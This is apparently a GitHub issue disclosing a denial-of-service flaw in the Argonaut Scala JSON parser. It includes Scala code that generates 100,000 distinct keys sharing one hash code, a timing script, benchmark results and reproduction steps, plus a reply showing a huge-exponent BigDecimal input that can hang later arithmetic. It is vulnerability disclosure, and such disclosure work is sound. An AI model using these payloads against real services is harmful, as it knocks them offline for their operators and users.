Denial of service when parsing JSON object with keys that have the same hash code
Throughput decreases sub-quadratically as the number of JSON object fields (with keys that have the same hash code) increases.
On contemporary CPUs, parsing such a JSON object (a sequence of 100000 fields like the ones below, ~1.6 MB in total) can take more than 100 seconds:
{
"!!sjyehe":null,
"!!sjyeiF":null,
"!!sjyej'":null,
"!!sjyfIe":null,
"!!sjyfJF":null,
...
}
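All keys in such a payload are distinct strings that share a single String.hashCode; for example, "!!sjyehe" and "!!sjyeiF" above hash to the same value. As a minimal sketch (not the benchmark's own generator), such keys can be produced from the well-known colliding pair "Aa"/"BB", because equal-length concatenations of blocks with equal hash codes also collide:

// Minimal sketch (illustration only): n distinct keys that all share one
// String.hashCode, built from the colliding 2-character blocks "Aa" and "BB".
def collidingKeys(n: Int): Seq[String] =
  (0 until n).map { i =>
    (0 until 17).map(bit => if (((i >> bit) & 1) == 0) "Aa" else "BB").mkString
  }

val keys = collidingKeys(100000)
assert(keys.distinct.size == keys.size)          // all keys are different strings
assert(keys.map(_.hashCode).distinct.size == 1)  // but they share one hash code
val payload = keys.map(k => "\"" + k + "\":null").mkString("{", ",", "}")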
Below are the results of the benchmark, where size is the number of such fields:
[info] REMEMBER: The numbers below are just data. To gain reusable insights, you need to follow up on
[info] why the numbers are the way they are. Use profilers (see -prof, -lprof), design factorial
[info] experiments, perform baseline and negative tests that provide experimental control, make sure
[info] the benchmarking environment is safe on JVM/OS/HW level, ask for reviews from the domain experts.
[info] Do not assume the numbers tell you what you want them to tell.
[info] Benchmark                            (size)  (value)   Mode  Cnt       Score       Error  Units
[info] ExtractFieldsBenchmark.readArgonaut       1     null  thrpt    5  969947.719 ± 47977.521  ops/s
[info] ExtractFieldsBenchmark.readArgonaut      10     null  thrpt    5  220650.585 ± 27891.347  ops/s
[info] ExtractFieldsBenchmark.readArgonaut     100     null  thrpt    5    7580.773 ±  1298.528  ops/s
[info] ExtractFieldsBenchmark.readArgonaut    1000     null  thrpt    5      71.919 ±     7.111  ops/s
[info] ExtractFieldsBenchmark.readArgonaut   10000     null  thrpt    5       0.444 ±     0.089  ops/s
[info] ExtractFieldsBenchmark.readArgonaut  100000     null  thrpt    5       0.010 ±     0.002  ops/s
Reproducible Test Case
To run these benchmarks on your JDK:
- Install the latest version of sbt and/or ensure that it is already installed properly:
sbt about
- Clone the jsoniter-scala repo:
git clone https://github.com/plokhotnyuk/jsoniter-scala.git
- Enter the cloned directory and check out the specific branch:
cd jsoniter-scala
git checkout argonaut-DoS-by-hashmap-collisions
- Run the benchmarks, passing the path to your JDK (a standalone sketch that skips sbt follows this step):
sbt -no-colors 'jsoniter-scala-benchmark/jmh:run -jvm /usr/lib/jvm/jdk-11/bin/java -wi 3 -i 5 .*ExtractFieldsBench.*Argonaut.*'
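If you just want to observe the slowdown without the sbt setup, a rough standalone sketch (assuming Argonaut 6.2.x on the classpath; this is not the repository's JMH benchmark) is to feed a payload of colliding keys straight into Argonaut's parser and time it:

// Rough standalone sketch (not the repository's JMH benchmark): time Argonaut's parser
// on a JSON object whose keys all share one hash code. The parse time degrades sharply
// as the number of fields grows (compare with the benchmark numbers above).
import argonaut._, Argonaut._

val keys = (0 until 100000).map { i =>  // same construction as the sketch above
  (0 until 17).map(bit => if (((i >> bit) & 1) == 0) "Aa" else "BB").mkString
}
val payload = keys.map(k => "\"" + k + "\":null").mkString("{", ",", "}")

val start = System.nanoTime()
val parsed: Either[String, Json] = payload.parse
println(s"Parsed ${keys.size} colliding fields in ${(System.nanoTime() - start) / 1e9} s, ok = ${parsed.isRight}")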
@plokhotnyuk - I wasn't able to reproduce it in:
$ amm
Loading...
Welcome to the Ammonite Repl 1.0.3
(Scala 2.12.4 Java 1.8.0_121)
If you like Ammonite, please support our development at www.patreon.com/lihaoyi
@ import $ivy.`io.argonaut::argonaut:6.2.2`
import $ivy.$
@ import argonaut._, Argonaut._
import argonaut._, Argonaut._
@ case class Foo(num: BigDecimal)
defined class Foo
@ val str = """{ "num" : 1e1000000000}"""
str: String = "{ \"num\" : 1e1000000000}"
@ val json = str.parse
json: Either[String, Json] = Right(JObject(JsonObjectInstance(Map("num" -> JNumber(JsonDecimal("1e1000000000"))), Vector("num"))))
@ val jsonUnsafe = json.right.get
jsonUnsafe: Json = JObject(JsonObjectInstance(Map("num" -> JNumber(JsonDecimal("1e1000000000"))), Vector("num")))
@ DecodeJson.derive[Foo].decodeJson(jsonUnsafe)
res14: DecodeResult[Foo] = DecodeResult(Right(Foo(1E+1000000000)))
Could you please tell me how I might modify my example to reproduce the error that you raised in this issue?
@kevinmeredith This issue is about collisions in the hash map that is used for the internal representation of a JSON object, as in these issues: https://github.com/playframework/play-json/issues/186 https://github.com/spray/spray-json/issues/277 https://github.com/json4s/json4s/issues/553
Please start with the reproducible steps in the issue description, then look into the benchmark code to see how those messages are built, or just add a print statement to see what they look like.
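As a baseline illustration (independent of Argonaut and of this repository), a plain Scala immutable Map keyed by values that all share one hash code already degrades sharply, because every insert has to scan the single collision bucket that holds all previously added entries:

// Baseline sketch, independent of Argonaut: building a Map from n keys that all share
// one hash code slows down dramatically as n grows, since each insert scans the one
// collision bucket holding all previous entries.
final case class BadKey(id: Int) { override def hashCode: Int = 42 }

for (n <- Seq(1000, 5000, 25000)) {
  val start = System.nanoTime()
  (0 until n).foldLeft(Map.empty[BadKey, Unit])((m, i) => m.updated(BadKey(i), ()))
  println(s"$n colliding keys: ${(System.nanoTime() - start) / 1e6} ms")
}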
However, the case you mentioned is also unsafe for users of the parsed message... Just try passing the parsed value of that big decimal number to the following function and see what happens:
scala> val f = (x: BigDecimal) => x + 1
f: BigDecimal => scala.math.BigDecimal = $$Lambda$1210/93981118@790ac3e0
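For example (a hypothetical continuation, not part of the original session), adding 1 to the decoded value, which equals BigDecimal("1e1000000000"), forces an exact alignment of the scales and tries to materialize a number with roughly a billion decimal digits:

// Hypothetical continuation of the snippet above (not from the original REPL session).
// Adding 1 to BigDecimal("1e1000000000") requires an exact scale alignment that tries
// to build ~10^9 decimal digits; run it only in a disposable JVM, since it can hang or
// throw OutOfMemoryError.
val f = (x: BigDecimal) => x + 1
// f(BigDecimal("1e1000000000"))  // roughly equivalent to passing the decoded Foo.num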
👋 Hey folks! We've recently opened a bug bounty against this issue, so if you want to get rewarded 💰 for fixing this vulnerability 🕷, head over to https://huntr.dev!